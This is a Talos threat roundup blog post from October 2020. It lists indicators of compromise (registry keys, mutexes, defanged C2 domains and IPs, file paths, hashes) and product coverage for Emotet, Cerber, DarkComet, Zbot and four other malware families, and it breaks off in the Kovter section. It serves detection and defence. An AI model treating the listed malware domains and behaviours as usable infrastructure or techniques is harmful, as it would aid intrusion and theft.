Friday, October 9, 2020

Threat Roundup for October 2 to October 9


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 2 and Oct. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Packed.Banload-9773267-1 | Packed | Banload is a banking trojan believed to be developed by Brazilian cybercriminals and used primarily to infect machines in Latin America. One notable aspect of Banload is its use of custom kernel drivers to evade detection.
Doc.Malware.Emotet-9772039-0 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Razy-9772501-0 | Malware | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Ransomware.Cerber-9774556-0 | Ransomware | Cerber is a ransomware family that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Malware.Ursnif-9770757-2 | Malware | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Packed.Zbot-9773448-0 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
Win.Trojan.DarkComet-9772960-1 | Trojan | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.Kovter-9770937-1 | Packed | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.

Threat Breakdown

Win.Packed.Banload-9773267-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Key | Value Name | Occurrences
<HKCU>\ENABLELUA | - | 17
<HKCU>\ENABLELUA | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | - | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | Type | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | Start | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | ErrorControl | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | DisplayName | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | WOW64 | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO | ImagePath | 13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | Cleanup | 11
<HKCU>\WAP | - | 10
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | EnableLUA | 9
<HKCU>\CTFMONN | - | 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | bbd53e391fcfb15ade714900bc64fe0a5f97a2b2e1d53229bfa181e9c8af4cad.exe | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | ImagePath | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | Start | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | Type | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | ErrorControl | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | mozmziz | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | c75d65fa755a87cf2b2fb5d74e1a7a09f2a22108eac3a4b22e09532b797b3a85.exe | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | iypxo | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | vyfuwkn | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK | Group | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OEOMKG | - | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OEOMKG | ImagePath | 1

Mutexes | Occurrences
Global\<random guid> | 19
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
162[.]125[.]8[.]15 | 2
64[.]136[.]20[.]39 | 2
186[.]202[.]95[.]69 | 1
Domain Names contacted by malware. Does not indicate maliciousness.
Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\drivers\trs.sys | 13
\cleanup.bat | 11
\cleanup.exe | 11
\zip.exe | 11
\TITI.EXE | 11
\kill.txt | 11
%LOCALAPPDATA%\wap.exe | 10
%LOCALAPPDATA%\ctfmonn.exe | 6
%APPDATA%\config.txt | 2
%SystemRoot%\SysWOW64\drivers\peur.sys | 1
\ulbcsnjr.txt | 1
%SystemRoot%\SysWOW64\drivers\ammxllcr.sys | 1
\wdjard.txt | 1
%SystemRoot%\SysWOW64\drivers\luhfocak.sys | 1
\kqtq.txt | 1
%SystemRoot%\SysWOW64\drivers\bjauj.sys | 1
\stkcket.txt | 1
%ProgramFiles(x86)%\kvxjmh.txt | 1
%SystemRoot%\SysWOW64\drivers\bzfcqa.sys | 1
%LOCALAPPDATA%\ctmon.exe | 1
%SystemRoot%\SysWOW64\drivers\khgvf.sys | 1
%SystemRoot%\nney.txt | 1
%SystemRoot%\SysWOW64\drivers\jtdlfdgf.sys | 1
\rybnwhak.txt | 1
%SystemRoot%\SysWOW64\drivers\njwyrd.sys | 1
*See JSON for more IOCs

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images): AMP, ThreatGrid, MITRE ATT&CK


Doc.Malware.Emotet-9772039-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Key | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | - | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | Type | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | Start | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | ErrorControl | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | ImagePath | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | DisplayName | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | WOW64 | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | ObjectName | 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NLSLEXICONS004B | Description | 1
IP Addresses contacted by malware. Does not indicate maliciousness.
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
reklamdasiniz[.]com | 25
e13678[.]dspb[.]akamaiedge[.]net | 3
Files and/or directories created | Occurrences
%HOMEPATH%\Kvo990W | 25
%HOMEPATH%\Kvo990W\yhW0S8e | 25
%HOMEPATH%\Kvo990w\Yhw0s8e\N4kqup.exe | 25
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> | 7
%SystemRoot%\SysWOW64\kbd101 | 1
%SystemRoot%\SysWOW64\Syncreg | 1
%SystemRoot%\SysWOW64\winsta | 1
%SystemRoot%\SysWOW64\dot3api | 1
%SystemRoot%\SysWOW64\dinput | 1
%SystemRoot%\SysWOW64\fthsvc | 1
%SystemRoot%\SysWOW64\dsquery | 1
%SystemRoot%\SysWOW64\npdeployJava1 | 1
%SystemRoot%\SysWOW64\oleprn | 1
%SystemRoot%\SysWOW64\vpnikeapi | 1
%SystemRoot%\SysWOW64\dhcpcore6 | 1
%SystemRoot%\SysWOW64\d3d8thk | 1
%SystemRoot%\SysWOW64\cmdl32 | 1
%System32%\APHostService\wevtfwd.exe (copy) | 1
%SystemRoot%\SysWOW64\KBDLT | 1
%System32%\els\WMSPDMOE.exe (copy) | 1
%System32%\Fondue\WSClient.exe (copy) | 1
%SystemRoot%\SysWOW64\fdProxy | 1
%SystemRoot%\SysWOW64\unregmp2 | 1
%System32%\MsiCofire\taskkill.exe (copy) | 1
%System32%\Cortana.Persona\PortableDeviceWiaCompat.exe (copy) | 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, Malware, MITRE ATT&CK


Win.Malware.Razy-9772501-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\MSFONTSX | - | 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | EnableLUA | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER | UACDisableNotify | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_100E&SUBSYS_11001AF4&REV_03\3&2411E6FE&2&10 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0A08\1 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ACPI_HAL\PNP0C08\0 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\ACPI_HAL\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\HTREE\ROOT\0 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\*ISATAP\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\*TEREDO\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_AGILEVPNMINIPORT\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_L2TPMINIPORT\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANBH\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIPV6\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPPOEMINIPORT\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPTPMINIPORT\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_SSTPMINIPORT\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0000 | CustomPropertyHwIdKey | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP | Progress_MaxDialog | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP | Progress_CurrentInstall | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP | Progress_MaxInstall | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP | Progress_CurrentDialog | 24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SERVICES | NoServices | 24
<HKLM>\SOFTWARE\MICROSOFT\UPNP DEVICE HOST\HTTP SERVER\VROOTS\/UPNPHOST | - | 24

Mutexes | Occurrences
WMSetup10RTM-UI | 24
sduj3g | 24
Microsoft_WMP_70_CheckForOtherInstanceMutex | 1
Global\85551e81-05f3-11eb-887e-00501e3ae7b6 | 1
IP Addresses contacted by malware. Does not indicate maliciousness.
Domain Names contacted by malware. Does not indicate maliciousness.
Files and/or directories created | Occurrences
%TEMP%\m.avi | 25
%TEMP%\msnix32.exe | 25
%TEMP%\wmsetup.log | 24
%SystemRoot%\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | 24
%SystemRoot%\SERVIC~2\Local Settings\AppData\Local\Temp\MpCmdRun.log | 23

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images): AMP, ThreatGrid, MITRE ATT&CK


Win.Ransomware.Cerber-9774556-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 51 samples
Registry Key | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER | - | 51
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER | PendingFileRenameOperations | 51

Mutexes | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} | 51
\x6d74\x666f\x626e\x6962\x686d\x67\x6768\x6a71\x706c\x6e66\x6e6c\x706d\x6f62\x656c\x63\x7474\x7364\x636c\x706d\x6d71\x62 | 51
shell.{<random GUID>} | 25
IP Addresses contacted by malware. Does not indicate maliciousness.
Domain Names contacted by malware. Does not indicate maliciousness.
Files and/or directories created | Occurrences
%TEMP%\d19ab989 | 51
%TEMP%\d19ab989\4710.tmp | 51
%TEMP%\d19ab989\a35f.tmp | 51
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp | 51
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp | 51
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt | 51
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta | 51
%TEMP%\24e2b309\1719.tmp | 25
%TEMP%\24e2b309\4436.tmp | 25
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) | 25

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images): AMP, ThreatGrid, Malware, MITRE ATT&CK


Win.Malware.Ursnif-9770757-2

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | aclutxml | 9
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC | - | 9
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC | {D7908994-4AF8-210B-0CFB-1EE5005F32E9} | 6
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC | Client | 6
<HKCU>\SOFTWARE\MICROSOFT\IAM | Server ID | 4
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC | {344BD002-037D-867E-2DA8-E71AB15C0BEE} | 4

Mutexes | Occurrences
Local\{31F7CC8D-DC06-8BF4-6EF5-D0EF82F90493} | 6
Local\{73A713E4-3646-1D08-D857-CAA18C7B9E65} | 6
Local\{C955B29C-9464-E306-E60D-08C77A91BCEB} | 6
{3686B563-1D48-D82A-57CA-A18C7B9E6580} | 6
{3273ED2E-E9B8-342D-0386-2DA8E71AB15C} | 3
{722ADF9A-2987-7426-43C6-6DE8275AF19C} | 2
setaajmytymsgnewe | 1
{4E42D13C-5565-B0F6-4F62-59E4F3B69D58} | 1
IP Addresses contacted by malware. Does not indicate maliciousness.
Domain Names contacted by malware. Does not indicate maliciousness.
Files and/or directories created | Occurrences
%APPDATA%\Microsoft\Cicprov | 9
%APPDATA%\Microsoft\Cicprov\api-draw.exe | 9
%TEMP%\<random, matching [A-F0-9]{3,4}> | 9
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat | 9
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js | 6
\{5D9E0C27-180C-9720-0AE1-CCBBDEA5C01F} | 4
%TEMP%\EFE8\F7F4.tmp | 1
%TEMP%\2C5C\162E.tmp | 1
%TEMP%\B897.bi1 | 1
%TEMP%\5EF0\2F78.tmp | 1
%TEMP%\C515.bi1 | 1
%TEMP%\CAAC\6556.tmp | 1
%TEMP%\E0A0.bi1 | 1
%TEMP%\D844\EC22.tmp | 1
%TEMP%\F883.bi1 | 1
%TEMP%\9442\CA21.tmp | 1

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images): AMP, ThreatGrid, Umbrella, MITRE ATT&CK


Win.Packed.Zbot-9773448-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 47 samples
Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY | CleanCookies | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 | CheckSetting | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 | CheckSetting | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 | CheckSetting | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 | CheckSetting | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 | CheckSetting | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | {2EC645E8-BA31-AD44-55BA-04D54CAC27C8} | 7
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> | - | 7
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ | 17e59651 | 1
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ | 2e6fg30f | 1
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ | 1c530fij | 1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL | 1j037349 | 1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL | d3915hf | 1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL | 1f51aa07 | 1
<HKCU>\SOFTWARE\MICROSOFT\SYFI | 78i3a05 | 1
<HKCU>\SOFTWARE\MICROSOFT\SYFI | 28i58667 | 1
<HKCU>\SOFTWARE\MICROSOFT\SYFI | 3heae23 | 1
<HKCU>\SOFTWARE\MICROSOFT\JIDO | 15aj5a2j | 1
<HKCU>\SOFTWARE\MICROSOFT\JIDO | 2c60jjf5 | 1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY | 1d6h2idh | 1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY | 2h1d068f | 1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT | 2j12gbfb | 1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT | ig0e93h | 1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY | 18e3h87f | 1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT | 33j42d95 | 1

Mutexes | Occurrences
Global\{C30C6CF2-932B-408E-55BA-04D54CAC27C8} | 7
Global\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8} | 7
Global\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8} | 7
Global\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8} | 7
Local\{C8D239CA-C613-4B50-55BA-04D54CAC27C8} | 7
Local\{C8D239CB-C612-4B50-55BA-04D54CAC27C8} | 7
GLOBAL\{<random GUID>} | 7
Local\{<random GUID>} | 7
IP Addresses contacted by malware. Does not indicate maliciousness.
Domain Names contacted by malware. Does not indicate maliciousness.
*See JSON for more IOCs
Files and/or directories created | Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp | 25
%TEMP%\tmpbedf3695.bat | 1
%TEMP%\tmp067792e0.bat | 1
%TEMP%\tmp29825de5.bat | 1
%TEMP%\tmp5386a2fe.bat | 1
%TEMP%\tmp579e8252.bat | 1
%TEMP%\tmp5bd33adf.bat | 1
%TEMP%\tmp07452386.bat | 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

AMP (screenshot not reproduced in this text)

ThreatGrid (screenshot not reproduced in this text)

MITRE ATT&CK (technique heat map not reproduced in this text)

Win.Trojan.DarkComet-9772960-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\TASKBAND
Value Name: FavoritesRemovedChanges
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Adobe Photoshop
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Adobe Photoshop
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{3208RF83-73JI-UAN5-O8ME-26UN30T71N27} 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{3208RF83-73JI-UAN5-O8ME-26UN30T71N27}
Value Name: StubPath
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iexplorer
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: System32
2
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: NewIdentification
1
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: NewGroup
1
<HKCU>\SOFTWARE\OUTLAST-14-08 1
<HKCU>\SOFTWARE\OUTLAST-14-08
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\OUTLAST-14-08
Value Name: NewIdentification
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{8TGFG46H-1HA6-06D3-W4H2-11700U3B045B} 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AdobePhotoshop
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AdobePhotoshop
1
<HKCU>\SOFTWARE\JOHN 1
<HKCU>\SOFTWARE\JOHN
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\JOHN
Value Name: NewIdentification
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{8TGFG46H-1HA6-06D3-W4H2-11700U3B045B}
Value Name: StubPath
1
<HKCU>\SOFTWARE\17/08/2015 1
Mutexes Occurrences
_x_X_BLOCKMOUSE_X_x_ 6
_x_X_PASSWORDLIST_X_x_ 6
_x_X_UPDATE_X_x_ 6
***MUTEX*** 6
***MUTEX***_SAIR 6
***MUTEX***_PERSIST 5
Administrator5 4
xXx_key_xXx 4
{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3} 4
<random, matching '[A-Z0-9]{14}'> 4
0H5O44L47G1435Administrator15 1
KRU8D05D61LR75Administrator15 1
0H5O44L47G1435_SAIR 1
0H5O44L47G1435_RESTART 1
KRU8D05D61LR75_SAIR 1
KRU8D05D61LR75_RESTART 1
H48IHQL3P3B8KSAdministrator15 1
71D1NLMU3MUS37Administrator15 1
H48IHQL3P3B8KS_SAIR 1
H48IHQL3P3B8KS_RESTART 1
71D1NLMU3MUS37_SAIR 1
71D1NLMU3MUS37_RESTART 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
counterstrikexxx[.]no-ip[.]biz 4
zzzzzzzzzzz[.]no-ip[.]biz 2
floripamilgrau[.]no-ip[.]biz 1
john1991[.]no-ip[.]org 1
Files and or directories created Occurrences
%TEMP%\XX--XX--XX.txt 6
%TEMP%\UuU.uUu 6
%TEMP%\XxX.xXx 6
%APPDATA%\logs.dat 6
%TEMP%\Administrator7 4
%TEMP%\Administrator8 4
%TEMP%\Administrator2.txt 4
%APPDATA%\98B68E3C 4
%APPDATA%\98B68E3C\ak.tmp 4
%APPDATA%\Administrator-wchelper.dll 4
\default.html 3
%SystemRoot%\SysWOW64\install 3
%SystemRoot%\explorer 3
%SystemRoot%\explorer\explorer.exe 3
%SystemRoot%\SysWOW64\install\iexplorer.exe 2
%SystemRoot%\Win32 1
%SystemRoot%\SysWOW64\install\explorer.exe 1
%SystemRoot%\SysWOW64\system 1
%SystemRoot%\SysWOW64\system\explorer.exe 1
%SystemRoot%\Win32\windows.exe 1
%SystemRoot%\DASDASDA 1
%SystemRoot%\DASDASDA\TYTYTYT.exe 1
%APPDATA%\098E95FF\ak.tmp 1
%System32%\install\explorer.exe 1

File Hashes

007730b6a156a117e4f88a929b8c5f1b95869d7fb848edf3ba03bfb071fa75cf
3522e80335d2c7a3c3b52f6f1165a367076c0cc2aa3373693edeb32a78e85fda
4f03bedea9cbc328544670030a5464db88cedda803a7729f912b104a7be5f6c0
55dd70221585c371f9b88a6daa54c974c7e8c6d24ca334b5e484507a87db796e
5b49001de0bfb4cf84659520cc2c98872a001fefbb6c127a024874cbd78b1d71
b19bbecc27dcb938dc99d60991b5e4f2ff2fef0fb17626bdc2e43da882fc8a44
c2d03a5a544ee18cd17f05a05e3178d8aed779f0e2ad0adf34afa648555f79a1
c54c688ff66fc26c593b0715f946b2ea5a0ab4f612b6ea4c4ffdfa4b6be5ec8d
c73781692e32f6b27244ee7c2b927a4df71bf7a4e008a75f119cbb90abab02d5
d81946222b7d67e923744d0e84084fc072d6c848465da155631d03f925c0909f

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP (screenshot not reproduced in this text)

ThreatGrid (screenshot not reproduced in this text)

MITRE ATT&CK (technique heat map not reproduced in this text)

Win.Packed.Kovter-9770937-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
